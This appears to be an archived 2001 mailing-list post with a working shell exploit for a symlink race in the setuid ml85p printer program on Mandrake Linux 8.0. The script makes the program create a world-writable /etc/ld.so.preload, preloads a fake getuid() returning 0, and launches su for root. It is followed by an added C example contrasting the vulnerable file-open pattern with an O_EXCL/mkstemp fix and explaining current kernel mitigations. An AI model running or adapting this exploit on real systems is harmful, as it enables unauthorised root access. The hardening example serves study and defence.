Why code the exploit in C if you were just going to sprintf(); system() everything anyway? This is a bad exploit for a lame bug. I found this in April and wrote this exploit to muck around with /etc/ld.so.preload as a means of elevating privileges from symlink attacks locally. Old news, but still. This ml85p bug appears in Linux Mandrake 8.0. Thing is, this program is mode 4750 root:sys, so whatever... suid

----

#!/bin/sh
# Exploit using /usr/bin/ml85p default setuid program on
# Mandrake Linux 8.0
#
# You need to be in the sys group to be able to execute
# ml85p.

echo "** ml85p exploit"

# set the required umask: the setuid ml85p inherits it, so the file it
# creates through our symlink comes out world-writable
umask 0

# get the number of seconds since 1970; ml85p names its temp file
# /tmp/ml85g<seconds>, so this must match the second in which it runs
DATE=`date +"%s"`

if [ ! -u /usr/bin/ml85p ] || [ ! -x /usr/bin/ml85p ]
then
    echo "** this exploit requires that /usr/bin/ml85p is setuid and executable."
    exit 1
fi

# /etc/ld.so.preload must not already exist (or must already be writable):
# the world-writable mode only comes from ml85p *creating* it through the
# symlink. (The original test was inverted and bailed out when the file
# was absent.)
if [ -e /etc/ld.so.preload ] && [ ! -w /etc/ld.so.preload ]
then
    echo "** this exploit requires that /etc/ld.so.preload does not exist."
    exit 1
fi

echo "** creating file"
ln -s /etc/ld.so.preload /tmp/ml85g"$DATE"
echo "bleh" | /usr/bin/ml85p -s
rm /tmp/ml85g"$DATE"

echo "** creating shared library"
cat << _EOF_ > /tmp/g.c
int getuid(void) { return(0); }
_EOF_

echo "** compiling and linking shared object"
gcc -c -o /tmp/g.o /tmp/g.c
ld -shared -o /tmp/g.so /tmp/g.o
rm -f /tmp/g.c /tmp/g.o

echo "** rigging ld.so.preload"
echo "/tmp/g.so" > /etc/ld.so.preload

echo "** execute su. warning all getuid() calls will return(0) until you remove"
echo "** the line \"/tmp/g.so\" from /etc/ld.so.preload. removing /tmp/g.so without"
echo "** first fixing /etc/ld.so.preload may result in system malfunction"
su -

echo "** cleaning up"
# truncate rather than rm: the file is world-writable, /etc is not.
# (The original redirected the "cleaning up" banner into the preload file.)
: > /etc/ld.so.preload
rm -f /tmp/g.so
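The file-creation pattern the exploit above depends on, and the fix, as an added example. This is not code from the post or from ml85p, whose source is not on the page: vuln_open() only models what the post implies ml85p does (a guessable /tmp/ml85g<epoch> name, created with a permissive mode under the caller's umask, symlinks followed), safe_open() is the hardened version, and run_scenario() plays the attack out unprivileged in a scratch directory under /tmp with a plain file standing in for /etc/ld.so.preload. The function names and the scratch path are assumptions of the example.

```c
/* Added example, not code from the post or from ml85p. vuln_open() models
 * the behaviour the exploit relies on; safe_open() is the fix; run_scenario()
 * demonstrates both in a private scratch directory (assumed: /tmp is usable). */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <time.h>
#include <unistd.h>

/* Vulnerable: the name is guessable (the post guesses it with `date +%s`), and
 * O_CREAT without O_EXCL follows a symlink planted at that name, creating the
 * link target with mode 0666 & ~umask. Run setuid root under umask 0, that is a
 * root-owned, world-writable file wherever the attacker pointed the link. */
int vuln_open(const char *dir, time_t now, char *path, size_t pathlen)
{
    snprintf(path, pathlen, "%s/ml85g%ld", dir, (long)now);
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened: O_CREAT|O_EXCL fails with EEXIST if the name already exists, and a
 * symlink (even a dangling one) counts as existing, so the link is never
 * followed. The mode is 0600 regardless of umask. If the name is taken, fall
 * back to an unpredictable one from mkstemp() instead of retrying a guessable one. */
int safe_open(const char *dir, time_t now, char *path, size_t pathlen)
{
    snprintf(path, pathlen, "%s/ml85g%ld", dir, (long)now);
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd >= 0 || errno != EEXIST)
        return fd;
    snprintf(path, pathlen, "%s/ml85gXXXXXX", dir);
    mode_t old = umask(077);   /* belt and braces: glibc mkstemp already uses 0600 */
    fd = mkstemp(path);
    umask(old);
    return fd;
}

/* Plant a symlink at the predictable name, run both openers, and report:
 *   *vuln_hit  = 1 if vuln_open() created the link target world-writable
 *   *safe_hit  = 1 if safe_open() created the link target (must stay 0)
 *   *safe_mode = permission bits of the file safe_open() did create, or -1
 * Returns 0 on success, -1 if the scratch setup failed. Cleans up after itself. */
int run_scenario(int *vuln_hit, int *safe_hit, int *safe_mode)
{
    char dir[64], target[256], link[256], path[256];
    struct stat st;
    int fd;

    *vuln_hit = *safe_hit = 0;
    *safe_mode = -1;

    snprintf(dir, sizeof dir, "/tmp/preload-demo-%ld", (long)getpid());
    if (mkdir(dir, 0700) != 0)
        return -1;
    snprintf(target, sizeof target, "%s/ld.so.preload", dir); /* stand-in for /etc/ld.so.preload */
    time_t now = time(NULL);
    snprintf(link, sizeof link, "%s/ml85g%ld", dir, (long)now);
    if (symlink(target, link) != 0) {
        rmdir(dir);
        return -1;
    }

    mode_t old = umask(0);        /* the post runs the setuid program with umask 0 */
    fd = vuln_open(dir, now, path, sizeof path);
    umask(old);
    if (fd >= 0) {
        close(fd);
        if (stat(target, &st) == 0 && (st.st_mode & S_IWOTH))
            *vuln_hit = 1;
    }
    unlink(target);               /* the symlink is dangling again */

    fd = safe_open(dir, now, path, sizeof path);
    if (stat(target, &st) == 0)
        *safe_hit = 1;
    if (fd >= 0) {
        if (fstat(fd, &st) == 0)
            *safe_mode = (int)(st.st_mode & 0777);
        close(fd);
        unlink(path);
    }
    unlink(target);
    unlink(link);
    rmdir(dir);
    return 0;
}

/* 1 iff the vulnerable opener was hijacked and the hardened one was not. */
int scenario_ok(void)
{
    int v, s, m;
    if (run_scenario(&v, &s, &m) != 0)
        return 0;
    return v == 1 && s == 0 && m == 0600;
}

int main(void)
{
    int v, s, m;
    if (run_scenario(&v, &s, &m) != 0) {
        perror("scratch setup");
        return 1;
    }
    printf("vuln_open followed the symlink and made target world-writable: %s\n", v ? "yes" : "no");
    printf("safe_open followed the symlink: %s (created its own file with mode %04o)\n",
           s ? "yes" : "no", m < 0 ? 0 : (unsigned)m);
    return scenario_ok() ? 0 : 1;
}
```

Build with `cc -Wall -o preload-demo preload-demo.c && ./preload-demo`. Two caveats worth knowing. First, the reason a writable /etc/ld.so.preload is enough for the su trick is that, unlike LD_PRELOAD, that file is honoured for setuid binaries, so the fake getuid() is loaded into su itself; the post's warning about fixing the file before removing /tmp/g.so is not idle, since every dynamically linked program on the box would then try to preload a missing object. Second, on a current Linux with fs.protected_symlinks=1 the original /tmp symlink would not be followed at all, because root (ml85p) would be following a user-owned link in the sticky, root-owned /tmp; the demo above sidesteps that by using a private, non-sticky scratch directory, which is why it reproduces the pattern even on a hardened host.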
This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 12:15:37 PDT